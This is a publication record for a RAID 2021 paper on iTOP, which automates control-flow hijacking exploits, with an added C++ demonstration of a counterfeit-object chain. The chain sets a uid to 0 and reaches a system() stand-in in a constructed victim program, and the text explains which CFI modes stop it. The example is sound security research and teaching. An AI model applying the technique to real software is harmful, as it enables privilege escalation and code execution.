ITOP: Automating counterfeit object-oriented programming attacks

Paul Muntean, Richard Viehoever, Zhiqiang Lin, Gang Tan, Jens Grossklags, Claudia Eckert

Publication: Contribution to book/report/conference proceedings › Conference paper › Peer-reviewed

1 citation (Scopus)

Abstract

Exploiting a program requires a security analyst to manipulate data in program memory with the goal of obtaining control over the program counter and escalating privileges. However, this is a tedious and lengthy process, as: (1) the analyst has to massage program data such that a logically reliable data-passing chain can be established, and (2) depending on the attacker's goal, certain in-place fine-grained protection mechanisms need to be bypassed. Previous work has proposed various techniques to facilitate exploit development. Unfortunately, none of them can be easily used to address these challenges. This is because data in memory is difficult to massage for an analyst who does not know the peculiarities of the program, as the attack specification is most of the time only available textually and not automated at all. In this paper, we present indirect transfer oriented programming (iTOP), a framework to automate the construction of control-flow hijacking attacks in the presence of strong protections including control-flow integrity (CFI), data execution prevention, and stack canaries. Given a vulnerable program, iTOP automatically builds an exploit payload with a chain of viable gadgets whose memory constraints are solved with an SMT solver. One salient feature of iTOP is that it contains 13 attack primitives powered by a Turing-complete payload specification language, ESL. It also combines virtual and non-virtual gadgets using COOP-like dispatchers. As such, when searching for gadget chains, iTOP can respect, for example, a previously enforced CFI policy by using only legitimate control-flow transfers. We have evaluated iTOP with a variety of programs and demonstrated that it can successfully generate exploits with the developed attack primitives.
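
The counterfeit-object technique the abstract builds on, shown as an added example that is not code from the paper or from the iTOP tool: a constructed victim program whose dispatcher `run_all()` contains a single virtual call, and an attacker who plants two counterfeit objects in a corrupted container (a fake `Counter` whose virtual function adds a chosen value to a chosen address, and a fake `Command` whose virtual function calls a non-virtual function through a function pointer). No return address is overwritten and no code is injected, so DEP and stack canaries are untouched, and every transfer is an ordinary virtual call site. The class names, the gadget labels (ML-G for the main-loop dispatcher, ARITH-G and INV-G for the two vfgadgets, following COOP terminology) and the layout assumptions (Itanium C++ ABI on x86-64 as used by GCC and Clang on Linux: vptr at offset 0, a virtual destructor occupying two vtable slots, the first other virtual function in slot 2) are this example's own. Strictly, calling a virtual function on memory that was never constructed as that type is undefined behaviour; the example relies on how real compilers actually lay objects out, which is exactly what the attack relies on too.

```cpp
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <string>
#include <vector>

/* ---- Victim program (constructed for this example) ---- */

struct Job {                           // interface the dispatcher works on
    virtual ~Job() {}                  // slots 0/1: complete + deleting dtor
    virtual void run() = 0;            // slot 2: the call run_all() makes
};

struct PrintJob : Job {
    std::string text;
    std::string* sink = nullptr;
    void run() override { *sink += text; }
};

// Unrelated classes whose slot-2 virtual functions become vfgadgets.
struct Counter {                       // ARITH-G: "*target += step"
    virtual ~Counter() {}
    virtual void tick() { *target += step; }
    long* target = nullptr;
    long step = 0;
};

struct Command {                       // INV-G: "fn(arg)" reaches a non-virtual function
    virtual ~Command() {}
    virtual void execute() { fn(arg); }
    void (*fn)(const char*) = nullptr;
    const char* arg = nullptr;
};

struct Session { long uid = 1000; };   // plain data the attacker wants to change

static std::string g_launched;         // records what launch() was asked to run
static void launch(const char* cmd) { g_launched = cmd; }   // stand-in for system()

// ML-G: a legitimate dispatcher over an attacker-influenced container.
static void run_all(const std::vector<Job*>& jobs) {
    for (Job* j : jobs) j->run();      // the only control transfer used: a virtual call
}

/* ---- Attacker side: counterfeit objects written into raw memory ---- */

// Layout of a three-word counterfeit object (vptr + two data words).
struct Counterfeit { const void* vptr; std::uint64_t w1; std::uint64_t w2; };

// A real exploit gets vtable addresses from an info leak; here they are read
// from live objects of the class to keep the example self-contained.
static const void* vtable_of(const void* obj) {
    const void* vptr;
    std::memcpy(&vptr, obj, sizeof vptr);
    return vptr;
}

struct ChainResult { long uid; std::string launched; std::string output; };

ChainResult run_chain() {
    Session s;                          // target: uid 1000 -> 0
    Counter c; Command k;               // only used to obtain vtable addresses
    std::string out;

    Counterfeit obj1 { vtable_of(&c),                              // Counter::tick
                       reinterpret_cast<std::uint64_t>(&s.uid),    // target = &s.uid
                       static_cast<std::uint64_t>(-1000LL) };      // step = -1000
    Counterfeit obj2 { vtable_of(&k),                              // Command::execute
                       reinterpret_cast<std::uint64_t>(&launch),   // fn = launch
                       reinterpret_cast<std::uint64_t>("id") };    // arg = "id"

    // "Attacker-controlled" heap memory holding the two counterfeit objects.
    unsigned char* mem = static_cast<unsigned char*>(std::malloc(2 * sizeof(Counterfeit)));
    std::memcpy(mem, &obj1, sizeof obj1);
    std::memcpy(mem + sizeof obj1, &obj2, sizeof obj2);

    PrintJob legit; legit.text = "real job\n"; legit.sink = &out;
    std::vector<Job*> jobs {            // corrupted container: one real job, two fakes
        &legit,
        reinterpret_cast<Job*>(mem),
        reinterpret_cast<Job*>(mem + sizeof obj1) };
    g_launched.clear();
    run_all(jobs);                      // dispatcher runs the chain unknowingly
    std::free(mem);
    return { s.uid, g_launched, out };
}

int main() {
    ChainResult r = run_chain();
    std::printf("uid=%ld launched=%s output=%s", r.uid, r.launched.c_str(), r.output.c_str());
    return (r.uid == 0 && r.launched == "id") ? 0 : 1;
}
```

Built with `g++ -O2 -fstack-protector-strong` (the file name is yours), `uid` goes from 1000 to 0 and `launch("id")` is reached from a dispatcher that only ever calls `Job::run()`. A coarse-grained CFI policy that merely checks that an indirect call lands on a function entry accepts both counterfeit calls, which is the sense in which such chains use only legitimate control-flow transfers. A fine-grained vtable check does not: rebuilding with `clang++ -flto -fvisibility=hidden -fsanitize=cfi-vcall` aborts at the first counterfeit object, because the check verifies that the vptr belongs to a vtable valid for the static type `Job`, not just that the target is some function.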

Original language: English
Title: Proceedings of 2021 24th International Symposium on Research in Attacks, Intrusions and Defenses, RAID 2021
Publisher: Association for Computing Machinery
Pages: 162-176
Number of pages: 15
ISBN (electronic): 9781450390583
DOIs
Publication status: Published - 6 Oct 2021
Event: 24th International Symposium on Research in Attacks, Intrusions and Defenses, RAID 2021 - Virtual, Online, Spain
Duration: 6 Oct 2021 to 8 Oct 2021

Publication series

Name: ACM International Conference Proceeding Series

Conference

Conference: 24th International Symposium on Research in Attacks, Intrusions and Defenses, RAID 2021
Country/Territory: Spain
City: Virtual, Online
Period: 6/10/21 to 8/10/21
